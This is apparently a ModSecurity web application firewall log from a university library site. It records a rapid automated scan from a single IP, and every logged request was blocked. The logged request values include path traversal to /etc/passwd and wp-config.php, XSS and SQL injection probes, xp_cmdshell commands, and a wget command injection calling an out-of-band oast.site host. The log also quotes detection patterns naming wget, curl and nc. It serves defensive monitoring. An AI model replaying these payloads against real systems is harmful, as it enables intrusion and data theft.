[Tue Aug 29 11:45:19.365022 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhgoHUAAAAb"]
[Tue Aug 29 11:45:20.378231 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAfiYuYAAAAg"]
[Tue Aug 29 11:45:23.355279 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhZRe4AAAAG"]
[Tue Aug 29 11:45:23.358773 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhpwQUAAAAm"]
[Tue Aug 29 11:45:24.368683 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhoHMgAAAAl"]
[Tue Aug 29 11:45:24.414477 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135MCo-f0AAAh7wuEAAAA5"]
[Tue Aug 29 11:45:25.356781 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhpwQkAAAAm"]
[Tue Aug 29 11:45:25.411034 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAh5RXcAAAA3"]
[Tue Aug 29 11:45:25.425351 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135cCo-f0AAAfbkxcAAAAZ"]
[Tue Aug 29 11:45:27.360664 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAh3f7wAAAA1"]
[Tue Aug 29 11:45:28.412686 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAh3f78AAAA1"]
[Tue Aug 29 11:45:29.395454 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhuiyoAAAAr"]
[Tue Aug 29 11:45:30.392854 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhtjd8AAAAq"]
[Tue Aug 29 11:45:30.423494 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAhhcx8AAAAd"]
[Tue Aug 29 11:45:35.438877 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhBSBsAAAAX"]
[Tue Aug 29 11:45:36.576768 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DawAAAA2"]
[Tue Aug 29 11:45:43.538994 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gu8hjikb6j1pd6.oast.site found within TX:1: cjmnbitjmimt14dgn26gu8hjikb6j1pd6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhui0wAAAAr"]
[Tue Aug 29 11:45:47.549557 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhBSC0AAAAX"]
[Tue Aug 29 11:45:48.654390 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhlz7sAAAAi"]
[Tue Aug 29 11:45:48.976635 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi4NDQAAAAQ"]
[Tue Aug 29 11:45:49.386033 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi2x@oAAAAN"]
[Tue Aug 29 11:45:51.453106 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAhZRhQAAAAG"]
[Tue Aug 29 11:45:56.429869 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAi2x-4AAAAN"]
[Tue Aug 29 11:46:01.365511 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAipS4MAAAAF"]
[Tue Aug 29 11:46:01.424750 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAi@S-gAAAAM"]
[Tue Aug 29 11:46:02.390991 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhgoMAAAAAb"]
[Tue Aug 29 11:46:02.432595 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhgoMIAAAAb"]
[Tue Aug 29 11:46:05.342536 2023] [:error] [pid 2239] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ADOLF, HUALA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14DcCo-f0AAAi-Q@YAAAAH"]
[Tue Aug 29 11:46:07.376325 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26g5xnc5t3xcobyx.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhZRkcAAAAG"]
[Tue Aug 29 11:46:08.432595 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAdxUpwAAAAC"]
[Tue Aug 29 11:46:09.475398 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5UAAAAF"]
[Tue Aug 29 11:46:09.554292 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-wAAAAi"]
[Tue Aug 29 11:46:12.451114 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi5uEEAAAAS"]
[Tue Aug 29 11:46:12.492191 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi5uEMAAAAS"]
[Tue Aug 29 11:46:13.378903 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 